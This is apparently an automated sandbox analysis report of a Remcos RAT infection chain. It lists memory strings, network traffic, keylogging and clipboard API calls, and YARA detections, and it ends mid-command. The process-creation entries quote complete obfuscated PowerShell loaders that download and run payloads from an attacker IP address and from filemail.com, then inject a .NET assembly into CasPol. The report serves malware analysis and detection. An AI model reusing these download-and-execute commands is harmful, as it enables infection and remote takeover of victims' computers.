                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJK
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/coacbE
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestionsb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2157001994.00003720011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.privacysandbox.comb
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55693 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55664
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55677
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55693
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55677 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.8:49706 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXEJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = 